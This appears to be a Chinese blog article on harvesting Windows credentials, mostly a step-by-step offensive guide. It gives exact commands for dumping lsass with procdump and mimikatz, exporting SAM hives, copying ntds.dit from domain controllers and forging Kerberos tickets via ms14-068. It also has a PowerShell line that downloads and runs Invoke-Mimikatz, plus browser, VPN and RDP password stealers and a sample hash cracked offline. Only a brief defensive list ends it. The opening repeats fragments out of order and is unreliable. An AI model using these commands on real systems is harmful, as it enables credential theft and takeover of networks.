关闭windows复杂密码,密码安全系列文章之二
关闭windows复杂密码,密码安全系列文章之二2.gsecdumpinsidepro.com公司早期开发的提取密码工具,最新版本1.6,目前已经停止更新,其工具在saminside中可以获取。3.内网环境可以通过ntscan等工具进行扫描,暴力破解获取。4.本地物理接触获取。通过livecd、PE盘等工具,启动系统后,直接读取系统文件,将config文件夹全部复制,然后进行哈希值提取并暴力破解之。1.gethash
很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以外,还需要设置禁用光盘启动,禁止修改BIOS。下面介绍密码相关知识,了解这些将有助于防范黑客攻击和资料外泄。
1.2.1windows密码获取思路
windows系统密码获取有多种方式,下面对获取windows密码的思路进行总结:
1.通过0day直接获取权限,然后通过wce等工具获取明文或者哈希值,比如ms08067,通过溢出直接获取system权限,虽然现在越来越少,但现实中还是存在,比如最近的iis webdav、ms017-010溢出漏洞。
2.通过网站漏洞获取webshell后,通过系统存在漏洞提权,获取权限后再获取系统密码以及哈希值。
3.内网环境可以通过ntscan等工具进行扫描,暴力破解获取。
4.本地物理接触获取。通过livecd、PE盘等工具,启动系统后,直接读取系统文件,将config文件夹全部复制,然后进行哈希值提取并暴力破解之。
1.2.2密码哈希值获取工具
1.gethash
insidepro.com公司早期开发的提取密码工具,最新版本1.6,目前已经停止更新,其工具在saminside中可以获取。
2.gsecdump
gsecdump目前版本为v2.0b5,由于其使用的广泛性,因此被google浏览器以及杀毒软件定义为病毒,官方网站已经不提供下载地址,可以给官方(info@truesec.co)发邮件索取。
3.QuarksPwDump
Quarks PwDump是quarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,目前它支持Windows XP/2003/Vista/7/2008版本,且相当稳定。可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。
4.pwdump
Pwdump4.02版本中有两个文件,一个是Pwd4.dll,另外一个是Pwdump4.exe,在早期版本中其dll文件为lsaext.dll。
5.mimikatz
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展,最新版下载地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180205/mimikatz_trunk.zip
6. Windows Credentials Editor (WCE)
WCE是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。,而且体积也非常小,是内网渗透手必备工具。https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
7.reg命令导出到文件
通过执行reg命令将sam、system、security文件内容导出到文件。
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
8.procdump.exe mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPassword
1.2.3密码获取方法
1.物理接触获取密码法
通过将Ophcrack liveCD(http://ophcrack.sourceforge.net/download.php?type=livecd)、BT5、kali、PE等制作成启动光盘或者启动U盘,启动系统后将系统目录下的config文件下的SAM和SECURITY文件复制出来。通过saminside导入即可进行破解。
2.前面提及工具的密码获取方法
(1)gethash $local
(2)gsecdump –a
(3)QuarksPwDump
QuarksPwDump -dhl 导出本地哈希值
QuarksPwDump –dhdc 导出内存中的域控哈希值
QuarksPwDump -dhd 导出域控哈希值,必须指定NTDS文件
(4)pwd4 /l /o:filename.sam
(5)mimikatz
privilege::debug
sekurlsa::logonpasswords
(6)wce –a
3.域控密码获取
(1)gsecdump法
gsecdump –s >all.txt
(2)QuarksPwDump法
ntdsutil snapshot "activate instance ntds" create quit quit//创建快照
ntdsutil snapshot "mount {GUID}" quit quit // Ntdsutil挂载活动目录的快照
copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit //复制快照的本地磁盘
ntdsutil snapshot "unmount {GUID}" quit quit //卸载快照
ntdsutil snapshot "delete {GUID}" quit quit //删除快照
QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit //提权文件hash值
注意:获取哈希值最好都在同一台服务器上执行,也即将QuarksPwDump.exe直接放在导出ntds.dit服务器上,执行导出命令。如果仅仅将ntds.dit复制后下载本地可能会出现无法读取错误。如果是想下载ntds.dit到本地恢复还需要执行“reg save hklm\system system.hive”,将system.hive和ntds.dit全部复制到本地进行域控密码获取。网上也曾经出现一个NTDS.dit密码快速提取工具ntdsdump,使用命令来快速提取:
NTDSDump.exe -f ntds.dit -s SYSTEM -o Hash.txt
(3)使用ms14-068漏洞攻击域控服务器获取域控权限
ms14-068.exe -u -p -s –d 生成伪造缓存test.ccache,然后通过mimikatz导入test.ccache:
kerberos::ptc test.ccache
net use命令获取域控权限:
net use \\A-EE64804.TEST.LOCAL
dir \\A-EE64804.TEST.LOCAL\c$
通过前面的方法来获取域控密码。
4.使用winlogonhack获取系统密码
安装winlogonhack记录程序,记录3389登录密码到系统目录下的boot.dat文件。
5使用ps1批量获取windows密码
在Windows2008及以上操作系统中执行命令:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
注意:获取密码的计算机必须能够访问raw.githubusercontent.com网络,也可以将该ps文件下载到其他地址,然后替换后执行.
6.在msf获取反弹的shell上获取密码。
(1)getuid 获取当前帐号为系统权限,则进行后续操作,否则通过ps命令去获取小于1000以内的pid,执行migrate pid来提升权限后,继续执行后续步骤。
(2)load mimikatz
(3)运行mimikatz下面的凭证获取命令
kerberos 获取网络认证协议凭证,其中可能会有明文密码
msv 获取msv 凭证,其中包含LM和NTLM哈希密码值
wdigest 获取wdigest (摘要式身份验证)凭证,其中可能会有明文密码
(4)还可以执行hashdump来导出系统的哈希密码值
7. iis7配置文件密码读取
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
8.vpn密码获取
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
9.openvpn配置及其密码
发现安装有OpenVPN,可以将其配置文件夹config全部复制到本地,重新覆盖后可以只用其key和密码或者密钥进行登录,如图1所示。
图1复制vpn配置文件
10.windows下浏览器、EMail、远程桌面等密码获取工具
nirsoft 公司(http://www.nirsoft.net/password_recovery_tools.html)提供很多的免费密码获取工具。其所有工具包http://www.nirsoft.net/packages/passrecenc.zip,压缩文件密码:nirsoft123!。
(1)mail密码获取工具mailpv
http://www.nirsoft.net/toolsdownload/mailpv.zip
(2)msn密码获取工具mspass
http://www.nirsoft.net/toolsdownload/ mspass.zip
(3)IE密码获取工具IEpassview,执行效果如图2所示。在内网个人或者服务器上比较有用,可以获取内网一些cms登录记录的密码。http://www.nirsoft.net/toolsdownload/iepv.zip
图2IE密码记录获取
(4)Outlook密码获取工具pst_password
http://www.nirsoft.net/toolsdownload/pstpassword.zip
(5)Foxfire、Chrome、opera浏览器密码获取工具passwordfox和chromepass
http://www.nirsoft.net/toolsdownload/passwordfox.zip
http://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
http://www.nirsoft.net/toolsdownload/chromepass.zip
http://www.nirsoft.net/toolsdownload/operapassview.zip
http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip
(6)无线网络密码获取工具
http://www.nirsoft.net/toolsdownload/wirelesskeyview-x64.zip
http://www.nirsoft.net/toolsdownload/wirelesskeyview.zip
(7)远程桌面密码获取工具rdpv
http://www.nirsoft.net/toolsdownload/rdpv.zip
cmdkey /list 查看3389可信任链接,使用netpass.exe即可知道密码
(8)vnc密码获取工具
http://www.nirsoft.net/toolsdownload/vncpassview.zip
11.数据库密码获取
可以通过分析网站源代码从数据库配置文件例如conn.php、web.config、config.php等文件中获取数据库的账号、密码及服务器IP地址。
12.使用cain等工具进行嗅探
使用cain工具在内网进行精确嗅探,可以嗅探各种密码,但嗅探时间不宜过长,否则因为流量异常容易被发现。
1.2.4物理接触获取密码方法
对于上班的个人计算机,如果在BIOS中未设置安全验证和禁止光盘、网络和U盘启动,入侵者可以通过物理接触计算机,窃取个人计算机资料。
1.获取系统sam和system文件
通过livecd、BT5、Kali、ophcrack等工具盘,启动系统后,将windows\system32\config文件夹下的SAM、SYSTEM和SECURITY文件复制出来,如图3所示。
图3复制sam、security和security文件
2.导入sam和system和文件
使用saminside工具软件,选择导入sam、security和system文件,即从File中选择第一个选项,如图4所示,分别选择sam、security和system文件,其NTLM哈希值就出来了。
图4获取用户密码哈希值
3.使用ophcrack进行密码破解
选择需要破解的密码哈希值,将其导出,然后单独复制需要破解的哈希值,在本例中为:
Administrator:500:E7108C208C467BF789985C6892014BB8:981A05EBA7EA97FA5E776705E985D15A:管理计算机(域::将该值复制到ophcrack中进行破解,如图5所示。
图5使用ophcrack进行暴力破解
4.通过网站在线破解
LM哈希值和NT哈希值复制到网站http://www.objectif-securite.ch/ophcrack.php(改版后新地址为:https://www.objectif-securite.ch/ophcrack)进行破解,如图6所示,直接就出来了,密码为mmd-333cyx。
1.2.5个人计算密码安全防范方法和措施
通过笔者研究,可以通过以下一些方法和措施来加强个人计算机安全。
1.安装杀毒软件,及时更新病毒库,并设置病毒保护密码。无该密码无法清除杀毒软件查杀的病毒。
2.设置强健的密码。目前14位以下的密码,通过ophcrack可以快速进行破解,建议设置超过14位以上的字母大小写 数字 特殊字符的密码,可以是一句话的首字母加大小写加特殊字符加世界等。
3.设置BIOS禁止除硬盘外地其它方式启动,也即禁止从网络、光盘和优盘启动。
4.进入系统设置两道关口,第一道是BIOS进入密码,第二次是系统设置的密码。
作者最新原创图书:
《网络攻防实战研究:MySQL数据库攻击与防御》 京东购买地址:https://item.jd.com/12743208.html
《SQLMAP从入门到精通》 京东购买地址:https://item.jd.com/12671154.html
《Web服务器渗透实战技术》 京东购买地址:https://item.jd.com/12707216.html